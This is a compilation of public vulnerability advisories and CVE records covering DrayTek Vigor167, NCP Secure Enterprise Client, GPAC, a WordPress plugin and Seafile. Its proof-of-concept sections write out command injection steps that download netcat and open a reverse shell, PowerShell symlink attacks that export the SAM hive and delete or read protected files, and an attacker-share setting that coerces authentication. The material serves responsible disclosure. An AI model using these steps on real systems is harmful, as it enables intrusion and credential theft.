An OS Command Injection in the CLI interface on DrayTek Vigor167 version 5.2.2, allows remote attackers to execute arbitrary system commands and escalate privileges via any account created within the web interface.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-023 Product: Vigor167 Manufacturer: DrayTek Affected Version(s): 5.2.2 Tested Version(s): 5.2.2 Vulnerability Type: OS Command Injection (CWE-78) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2023-09-22 Solution Date: 2023-11-16 Public Disclosure: 2023-12-06 CVE Reference: CVE-2023-47254 Author of Advisory: Fabian Krone, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Vigor167 is a VDSL2 35b Supervectoring Modem. The manufacturer describes the product as follows (see \[1\]): "Vigor167 is a VDSL2 35b modem/router." Due to missing input validation, the command-line interface of the device is vulnerable to an OS command injection. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Vigor167 has a command-line interface available via both Telnet and SSH. This interface requires a login with any account available in the web interface. This also includes accounts which were denied every access according to their group settings. Afterward, a limited set of commands is available to the user. The ping command present allows injecting commands which are then executed on the device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Commands can be injected with backticks (\`\`). The current working directory can be printed out with the following command: vigor> exec ping \`pwd\` ping: /tmp: Unknown host Another possibility is to wrap the OS command in parentheses following a dollar sign like $(pwd). The available commands are very limited. For example, only a small fraction of the standard output from the injected commands is displayed. Furthermore, space characters lead to evaluation errors. In order to achieve a full reverse shell, some of BusyBox's internal commands can be used. A TFTP server is hosted as preparation on a computer which is reachable by Vigor167 over the network. A statically compiled version of Netcat\[2\] is hosted on the TFTP server. First, the operating system of Vigor167 is instructed to download the file: vigor> exec ping \`busybox${IFS}tftp${IFS}-l${IFS}/tmp/netcat${IFS}-g${IFS}-r${IFS}netcat${IFS}192.168.100.5\` BusyBox v1.00 (2023.05.29-03:34+0000) multi-call binary usage: ping \[OPTION\]... host ${IFS} is a POSIX variable that contains the field separator and serves as replacement for the space character. Then, the executable flag is set on the transferred Netcat binary: vigor> exec ping \`chmod${IFS}+x${IFS}/tmp/netcat\` BusyBox v1.00 (2023.05.29-03:34+0000) multi-call binary usage: ping \[OPTION\]... host On the computer hosting the TFTP server, a Netcat listener is opened. Then, a reverse shell can be spawned: vigor> exec ping \`/tmp/netcat${IFS}192.168.100.5${IFS}9001${IFS}-e${IFS}ash\` The reverse shell is opened to the targeted host: Connection from 192.168.100.1:43354 sh: turning off NDELAY mode pwd /tmp Vigor167 was used in modem mode. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update the modem's firmware to version 5.2.3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-07-30: Vulnerability discovered 2023-09-22: Vulnerability reported to manufacturer 2023-11-16: Patch released by manufacturer 2023-12-06: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Vigor167 https://www.draytek.com/products/vigor167 \[2\] Statically compiled MIPS32 Netcat https://github.com/darkerego/mips-binaries/blob/master/netcat \[3\] SySS Security Advisory SYSS-2023-023 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-023.txt \[4\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Fabian Krone of SySS GmbH. E-Mail: fabian.krone@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Fabian\_Krone.asc Key ID: 0xBFDF30ABD10EA0F4 Key Fingerprint: 0ADE D2AA AE27 7DDA A8F0 C051 BFDF 30AB D10E A0F4 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEECt7Sqq4nfdqo8MBRv98wq9EOoPQFAmVouRMACgkQv98wq9EO oPRkjhAAnkZCXYM9lqXIbN+pGZoA2Zv93z8JXv34vIhCahv1G47ocJ0L7kLb7KNz +EbLTEnoh9Kxukw7tjNV6zvHRhav2o5KQBaelgGyCAmgtcKp30eCkN0sO4ocBqm5 wBYbYxVzOk6+aMOxIR6B496lT5AvFtzHXeCuwm4Vewpv/v7L78ixA1vnD+cjJuHq BdA/IYxrQKUEeZBlBqNM1WFe2AUxhaxGnskBrQtnZcblrJwLj3CY4UCbAehFCN29 p0iw6ntnMfpSP85nwM7mNIQo1UFWvA3Dnx6sVK7LjokX+bBAgrjjklxUdZoN1exa htT12p6lE9UNWteFt0xkgdMRkTM48CUsDpiQORIRTbb20Haz9byNTieH3UxX/OLE mU/D/BhfX4F55f0Yxlz/kJ+5hLEv4EUUIfuM4uM6vntH1E8Y/FGMxdpWVqtvCU64 U6mr52/ZLWKxyyp1+qZn2UpkP9zntO8sNUd2Yt3TqpNfOydJGNff//A5gqPkJy6B s1bZEYNWN6zpkkVukFT+EIjQHyA8OaTud8TUmo0uuvN240S74yqKpb7czaAjdOwn c5h6IlqEYu70lpnEc2d9UFRN4nGJ/NiLuimDbFjaqtjzGa+rDFNNSHDvS8jN+tN5 bgZ6SPy+mXNh07dqET/SVaI8P/yIZmNIENtNrW7z6fbr6F+aKfk= =7izf -----END PGP SIGNATURE-----

CVE-2023-47254

Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to read registry information of the operating system by creating a symbolic link.

**usd-2022-0005 | NCP Secure Enterprise Client - Insecure Registry Export**

**Advisory ID:** usd-2022-0005  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Insecure Registry Export  
**Security Risk:** High  
**Vendor URL:** https://www.ncp-e.com/  
**Vendor Status:** Fixed

**Introduction**

The _Windows Registry_ is a central storage location for configuration settings on the _Windows_ operating system. Data that is stored  
within the _Windows Registry_ is utilized by several different components, like desktop applications, services, device drivers and also  
the kernel itself. Several locations within the _Windows Registry_ are known to contain sensitive information. The probably most well  
known example is the **HKLM\\SAM** hive, that stores hashed credentials of local user accounts.

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client supports a _Support Assistant_ feature, which allows low privileged user accounts to obtain diagnostic  
information from the operating system. Within this diagnostic information, the _NCP Secure Enterprise_ client also exports information  
from the _Windows Registry_. During this export, _Registry symbolic links_ are followed and may allow to redirect the export to an arbitrary  
location within the _Windows Registry_.

For such an attack to work, a low privileged user accounts need to be able to create _Registry symbolic links_ within the exported _Registry  
keys_. In the case of the _NCP Secure Enterprise_ client, this is possible, since the client exports all keys under **HKEY\_LOCAL\_MACHINE\\SYSTEM\\CurrentControlSet\\Services\*_recursively. On a default installation of_ Windows_, this_ Registry key _usually contains some keys where low privileged user accounts  
can create_ subkeys_. Newly created_ subkeys _are owned by the creating user and it is possible to create_ Registry symbolic links_within them that point to arbitrary_ Registry _locations. Since the_ symlink\* originates from a trusted** HKLM __hive, it is not restricted  
by_ Microsoft's_ protection features for _Registry symbolic links_.

**Proof of Concept**

The first step is finding a _Registry key_ within **HKEY\_LOCAL\_MACHINE\\SYSTEM\\CurrentControlSet\\Services** that is writable for low privileged  
user accounts. Corresponding keys might vary for different installations, but on our test systems it was always possible to find at least  
one such key. In the following we use the key **HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment** which seems to be available and allows  
the creation of _subkeys_ on most installations.

Within this _Registry key_ we now create a _symbolic link_ pointing to **HKLM\\SAM**

PS C:\\> $code \= (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content  
PS C:\\> Add-Type $code  
PS C:\\> \[de.usd.SharpLink.RegistryLink\]::CreateKey("HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB")  
\[+\] Creating registry key: HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB  
\[+\] Registry key was successfully created.  
PS C:\\> $r \= New-Object de.usd.SharpLink.RegistryLink("HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB\\LINK", "HKLM\\SAM")  
PS C:\\> $r.Open()  
\[+\] Creating registry key: \\Registry\\Machine\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB\\LINK  
\[+\] Assigning symlink property pointing to: \\Registry\\Machine\\SAM  
\[+\] RegistryLink setup successful!

After the _Registry symbolic link_ is setup, one can start the _Support Assistant_ using the _NCP Secure Enterprise_ client tray icon  
(upper right inside the _Help_ menu). After the _Support Assistant_ was started, it collects support information from the operating system:

The collected files can be viewed either from the _Support Assistant_ directly or by inspecting them in **C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\*\*.  
Within the** Services.reg **file, one can find the export of the** HKLM\\SAM\*\* hive:

**Fix**

During the collection of support information from the operating system, the _NCP Secure Enterprise_ client software should impersonate  
the user that started the _Support Assistant_. This way, only information that the invoking user is allowed to read can be obtained.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   **2022-02-02** First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is released
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

CVE-2023-28871: Security Advisory usd-2022-0005 | usd HeroLab

Heap Buffer Overflow vulnerability in GPAC version 2.3-DEV-rev617-g671976fcc-master, allows attackers to execute arbitrary code and cause a denial of service (DoS) via str2ulong class in src/media_tools/avilib.c in gpac/MP4Box.

**heap-buffer-overflow in str2ulong src/media\_tools/avilib.c:137:16 in gpac/MP4Box****Description**

Heap-buffer-overflow in MP4Box.  
#0 0x7ffff694c441 in str2ulong /afltest/gpac2/src/media\_tools/avilib.c:137:16

**Version**

MP4Box - GPAC version 2.3-DEV-rev617-g671976fcc-master
(c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io

Please cite our work in your research:
        GPAC Filters: https://doi.org/10.1145/3339825.3394929
        GPAC: https://doi.org/10.1145/1291233.1291452

GPAC Configuration:
Features: GPAC\_CONFIG\_LINUX GPAC\_64\_BITS GPAC\_HAS\_IPV6 GPAC\_HAS\_SSL GPAC\_HAS\_SOCK\_UN GPAC\_MINIMAL\_ODF GPAC\_HAS\_QJS GPAC\_HAS\_JPEG GPAC\_HAS\_PNG GPAC\_HAS\_FFMPEG GPAC\_HAS\_VORBIS GPAC\_HAS\_LINUX\_DVB

**ASAN Log**

./MP4Box -dash 500 -check-xml -dm2ts -bin -out /dev/null poc6gpac

\=================================================================
==1173259==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100001a330 at pc 0x7ffff694c442 bp 0x7ffffffeea70 sp 0x7ffffffeea68
READ of size 1 at 0x62100001a330 thread T0
    #0 0x7ffff694c441 in str2ulong /afltest/gpac2/src/media\_tools/avilib.c:137:16
    #1 0x7ffff694c441 in avi\_parse\_input\_file /afltest/gpac2/src/media\_tools/avilib.c:2004:9
    #2 0x7ffff694220a in AVI\_open\_input\_file /afltest/gpac2/src/media\_tools/avilib.c:1840:2
    #3 0x7ffff6f9d3f3 in avidmx\_process /afltest/gpac2/src/filters/dmx\_avi.c:492:14
    #4 0x7ffff6e8f502 in gf\_filter\_process\_task /afltest/gpac2/src/filter\_core/filter.c:2971:7
    #5 0x7ffff6e62ee9 in gf\_fs\_thread\_proc /afltest/gpac2/src/filter\_core/filter\_session.c:2105:3
    #6 0x7ffff6e6193d in gf\_fs\_run /afltest/gpac2/src/filter\_core/filter\_session.c:2405:3
    #7 0x7ffff67a625c in gf\_dasher\_process /afltest/gpac2/src/media\_tools/dash\_segmenter.c:1236:6
    #8 0x50dfc7 in do\_dash /afltest/gpac2/applications/mp4box/mp4box.c:4831:15
    #9 0x50dfc7 in mp4box\_main /afltest/gpac2/applications/mp4box/mp4box.c:6245:7
    #10 0x7ffff58cb082 in \_\_libc\_start\_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16
    #11 0x42adad in \_start (/afltest/gpac2/bin/gcc/MP4Box+0x42adad)

0x62100001a330 is located 0 bytes to the right of 4656-byte region \[0x621000019100,0x62100001a330)
allocated by thread T0 here:
    #0 0x4a34ed in malloc (/afltest/gpac2/bin/gcc/MP4Box+0x4a34ed)
    #1 0x7ffff6942aae in avi\_parse\_input\_file /afltest/gpac2/src/media\_tools/avilib.c:1944:35
    #2 0x7ffff694220a in AVI\_open\_input\_file /afltest/gpac2/src/media\_tools/avilib.c:1840:2

SUMMARY: AddressSanitizer: heap-buffer-overflow /afltest/gpac2/src/media\_tools/avilib.c:137:16 in str2ulong
Shadow bytes around the buggy address:
  0x0c427fffb410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffb420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffb430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffb440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffb450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x0c427fffb460: 00 00 00 00 00 00\[fa\]fa fa fa fa fa fa fa fa fa
  0x0c427fffb470: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffb480: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffb490: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffb4a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffb4b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
\==1173259\==ABORTING

**Reproduction**

git clone https://github.com/gpac/gpac.git
cd gpac
./configure --enable-sanitizer
make -j24

./bin/gcc/MP4Box -dash 500 -check-xml -dm2ts -bin -out /dev/null poc6gpac

_Thanks_ _for_ _your_ _time_!

**PoC**

poc6gpac: poc6gpac.zip

****Impact****

This vulnerability is capable of causing crashes, or possible code execution.

**Reference**

https://github.com/gpac/gpac

**Environment**

    ubuntu:20.04
    gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)
    clang version 10.0.0-4ubuntu1
    afl-cc++4.09
    

**Credit**

Zeng Yunxiang

Song Jiaxuan

CVE-2023-46932: heap-buffer-overflow in str2ulong src/media_tools/avilib.c:137:16 in gpac/MP4Box · Issue #2669 · gpac/gpac

Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to delete arbitrary files on the operating system by creating a symbolic link.

**usd-2022-0002 | NCP Secure Enterprise Client - Arbitrary File Delete**

**Advisory ID:** usd-2022-0002  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Arbitrary File Delete  
**Security Risk:** High  
**Vendor URL:** https://www.ncp-e.com/  
**Vendor Status:** Fixed

**Description**

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client supports a _Support Assistant_ feature, which allows low privileged user accounts to obtain diagnostic  
information from the operating system. The corresponding information is gathered by high privileged services and stored within the directory  
__C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\*_. Since this directory is fully user controlled, a low privileged user can create_ symbolic links_within it. This can be used to trick the_ NCP Secure Enterprise\* client to delete arbitrary files on the operating system.

**Proof of Concept**

To perform the arbitrary file delete, the following steps are necessary:

1.  Start the _Support Assistant_ and wait until all diagnostic information has been collected.
2.  Create a _symbolic link_ that originates from **C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\\services.txt**  
    and points to the targeted file.
3.  Abort the _Support Assistant_ and restart it.

After these steps have been executed, the targeted file should be deleted. In the following, we demonstrate  
each of the above mentioned steps.

First we start the _Support Assistant_ by using the tray icon of the _NCP Secure Enterprise_ client. The _Support Assistant_  
feature can be found in the upper right of the graphical user interface within the _Help_ menu.

After the diagnostic information has been collected, we create a _symbolic link_ pointing from **C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\\services.txt**  
to the well known **C:\\Windows\\win.ini** file.

PS C:\\> $code \= (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content  
PS C:\\> Add-Type $code  
PS C:\\> $s \= New-Object de.usd.SharpLink.Symlink("C:\\Users\\<USER>\\AppData\\Local\\Temp\\NCPSupport\\services.txt", "C:\\Windows\\win.ini")  
PS C:\\> $s.Open()  
\[!\] Junction directory C:\\Users\\<USER\>\\AppData\\Local\\Temp\\NCPSupport is not empty. Delete files? (y/N) y  
\[+\] Creating Junction: C:\\Users\\<USER\>\\AppData\\Local\\Temp\\NCPSupport \-> \\RPC CONTROL  
\[+\] Creating DosDevice: Global\\GLOBALROOT\\RPC CONTROL\\services.txt \-> \\??\\C:\\Windows\\win.ini  
\[+\] Symlink setup successfully.

Now the _Support Assistant_ is aborted and restarted. After this action has been performed, the **win.ini** does no longer exist.

PS C:\\> dir C:\\Windows\\win.ini  
dir : Der Pfad "C:\\Windows\\win.ini" kann nicht gefunden werden, da er nicht vorhanden ist.  
In Zeile:1 Zeichen:1  
+ dir C:\\Windows\\win.ini  
+ \~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\\Windows\\win.ini:String) \[Get-ChildItem\], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

**Fix**

It is assumed that the _NCP Secure Enterprise_ client checks for already existing diagnostic files before starting  
the _Support Assistant_ and attempts to delete them. This delete operation occurs with high privileges, resulting  
in the vulnerability. Instead, the delete operation should be performed while impersonating the invoking user account.  
This prevents the deletion of files the invoking user has insufficient permissions for.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   2022-02-02 First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is realesed
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

CVE-2023-28868: Security Advisory usd-2022-0002 | usd HeroLab

Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers read the contents of arbitrary files on the operating system by creating a symbolic link.

**usd-2022-0003 | NCP Secure Enterprise Client - Arbitrary File Read**

**Advisory ID:** usd-2022-0003  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Arbitrary File Read  
**Security Risk:** High  
**Vendor URL:** https//www.ncp-e.com/  
**Vendor Status:** Fixed

**Introduction**

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client supports a _Support Assistant_ feature, which allows low privileged user accounts to obtain diagnostic  
information from the operating system. After the corresponding information was collected, users can inspect the contents of the collected  
files within the graphical user interface of the _NCP_ application. Despite the graphical user interface runs with the permissions of the  
current user, inspecting a diagnostic file causes a high privileged service to read the contents of it. After reading, the contents are send to  
the graphical user interface of the _NCP_ application and displayed to the invoking user.

After the _Support Assistant_ has collected the diagnostic files, they are stored within the directory __C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\*_.  
This is also the directory where the high privileged service obtains the file contents from when files are inspected within the graphical  
user interface. Since the directory is fully user controlled, low privileged users can use a_ symbolic link\* to redirect the read operation to  
an arbitrary target.

**Proof of Concept**

The first step is to start the _Support Assistant_ within the tray icon of the _NCP Secure Enterprise_ client. The corresponding function  
can be found in the upper right of the graphical user interface under the _Help_ menu. After the _Support Assistant_ has collected the  
diagnostic information, the corresponding files are displayed within the graphical user interface:

Now it is possible to replace one of the files with a _symbolic link_ to an arbitrary target. In the following listing we replace the  
file **C:\\Users\\\\AppData\\Local\\Temp\\NCPSupport\\services.txt** with a _symbolic link_ pointing to **C:\\Windows\\CCM\\CcmEval.xml**.  
Moreover, we demonstrate that the target file is not readable for a low privileged user account:

PS C:\\> type C:\\Windows\\CCM\\CcmEval.xml  
type : Der Zugriff auf den Pfad "C:\\Windows\\CCM\\CcmEval.xml" wurde verweigert.  
In Zeile:1 Zeichen:1  
+ type C:\\Windows\\CCM\\CcmEval.xml  
+ \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    + CategoryInfo          : PermissionDenied: (C:\\Windows\\CCM\\CcmEval.xml:String) \[Get-Content\], UnauthorizedAccessException    + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommandPS C:\\> $code \= (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content  
PS C:\\> Add-Type $code  
PS C:\\> $s \= New-Object de.usd.SharpLink.Symlink("C:\\Users\\<USER>\\AppData\\Local\\Temp\\NCPSupport\\services.txt", "C:\\Windows\\CCM\\CcmEval.xml")  
PS C:\\> $s.Open()  
\[+\] Creating Junction: C:\\Users\\<USER\>\\AppData\\Local\\Temp\\NCPSupport \-> \\RPC CONTROL  
\[+\] Creating DosDevice: Global\\GLOBALROOT\\RPC CONTROL\\services.txt \-> \\??\\C:\\Windows\\CCM\\CcmEval.xml  
\[+\] Symlink setup successfully.

Now it is time to inspect the file **services.txt** within the _Support Assistant_ graphical user interface.  
Clicking the corresponding file twice shows the contents of the targeted file:

**Fix**

It is not evident why a high privileged service is used to display the obtained diagnostic information. The read operation  
should be performed by the low privileged process instead, which also draws the graphical user interface.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   **2022-02-02** First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is released
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

CVE-2023-28869: Security Advisory usd-2022-0003 | usd HeroLab

Insecure File Permissions in Support Assistant in NCP Secure Enterprise Client before 12.22 allow attackers to write to configuration files from low-privileged user accounts.

**usd-2022-0004 | NCP Secure Enterprise Client - Insecure File Permissions**

**Advisory ID:** usd-2022-0004  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Insecure File Permissions  
**Security Risk:** Medium  
**Vendor URL:** https//www.ncp-e.com/  
**Vendor Status:** Fixed

**Description**

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client stores it's configuration files within the directory **C:\\\\ProgramData\\\\NCP\\\\SecureClient**, which grants  
low privileged user accounts write access to most resources. Attackers can abuse this configuration in different ways as demonstrated  
in the _Proof of Concept_ section below:

**Proof of Concept**

This section contains proof of concepts for some of the writable resources:

**cacerts**

Since the folder **C:\\\\ProgramData\\\\NCP\\\\SecureClient\\\\cacerts** is writable for low privileged user accounts, it is possible to add new _CA_  
certificates that may allow connections to untrusted endpoints:

**cbo.ini**

The file **C:\\\\ProgramData\\\\NCP\\\\SecureClient\\\\config\\\\cbo.ini** is also writable for low privileged user accounts. This file  
can be used to configure custom branding of the _NCP Secure Enterprise_ client by specifying the path to the desired theme  
files. By specifying the address of a network share instead, it is possible to coerce a remote authentication by each user  
that logs in on the prepared workstation. Furthermore, since the _NCP Secure Enterprise_ client starts on startup, an remote  
authentication of the machine account can be coerced.

\[GENERAL\]  
Enabled\=1\[DEUTSCH\]  
Picture\=\\\\\\\\attacker\\\\share\\\\test.png  
HtmlLocal\=%BaseDataDir%\\\\CustomBrandingOption\\\\de\\\\bla.html\[ENGLISH\]  
Picture\=\\\\\\\\attacker\\\\share\\\\test.png  
HtmlLocal\=%BaseDataDir%\\\\CustomBrandingOption\\\\en\\\\bla.html

**ncpmon.ini**

The file **C:\\\\ProgramData\\\\NCP\\\\SecureClient\\\\config\\\\ncpmon.ini** contains several different configuration settings.  
One of them is the **LogPath** setting within the _Gina_ section. Since the file is writable by low privileged user  
accounts, it is possible to set the **LogPath** to an arbitrary directory.

\[GENERAL\]  
...SNIP...\[GINA\]  
DisableGinaClient\=0  
LogLevel\=9  
LogPath\=C:\\\\

The configuration is then used by a high privileged service to write into the corresponding location:

C:\\\\>dir  
 Datenträger in Laufwerk C: ist Windows   Verzeichnis von C:\\\\   05.05.2021  10:09    <DIR>          Program Files  
   05.05.2021  10:09    <DIR>          Program Files (x86)  
   05.05.2021  10:09    <DIR>          Users  
   05.05.2021  10:09    <DIR>          Windows  
   30.11.2021  10:51         1.960.248 NcpGinaLog.txt

Apart form the above mentioned issues, other attacks may be possible. The file **extdial.conf** contains e.g.  
the filenames of _dynamic linked library_ (_DLL_) files which could may lead to privilege escalation vulnerabilities  
on certain setups.

**Fix**

The contents of the configuration folder should be reviewed and more restrictive permissions should be applied  
to files that store sensitive configuration items. Low privileged user accounts should only be allowed to modify  
configuration options that do not affect the security of the operating system.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   2022-02-02 First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is released
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

CVE-2023-28870: Security Advisory usd-2022-0004 | usd HeroLab

The Digital Publications by Supsystic plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.6. This is due to missing or incorrect nonce validation on the AJAX action handler. This makes it possible for unauthenticated attackers to execute AJAX actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

This record contains material that is subject to copyright.

**Copyright 2012-2023 Defiant Inc.**

**License:** Defiant hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute this software vulnerability information. Any copy of the software vulnerability information you make for such purposes is authorized provided that you include a hyperlink to this vulnerability record and reproduce Defiant's copyright designation and this license in any such copy. **Read more.**

**Copyright 1999-2023 The MITRE Corporation**

**License:** CVE Usage: MITRE hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute Common Vulnerabilities and Exposures (CVE®). Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy. **Read more.**

Have information to add, or spot any errors? Contact us at wfi-support@wordfence.com so we can make any appropriate adjustments.

CVE-2023-5756: Digital Publications by Supsystic <= 1.7.6 - Cross-Site Request Forgery via AJAX action — Wordfence Intelligence

The next parameter in the /accounts/login endpoint of Seafile 9.0.6 allows attackers to redirect users to arbitrary sites.

CVE-2023-28874: Seafile Community Edition - Seafile Admin Manual

An issue in GPAC v.2.2.1 and before allows a local attacker to cause a denial of service (DoS) via the ctts_box_read function of file src/isomedia/box_code_base.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

\[Y\] I looked for a similar issue and couldn't find any.  
\[Y\] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/  
\[Y\] I give enough information for contributors to reproduce my issue

Description  
There is a integer overflow issue in isomedia/box\_code\_base.c:413

System info  
Ubuntu 22.04.2 LTS  
GPAC-2.2.1

Build command  
./configure --enable-sanitizer && make

crash command  
/usr/local/bin/MP4Box -saf -diod poc

poc\_file:  
poc.zip

Crash output:  
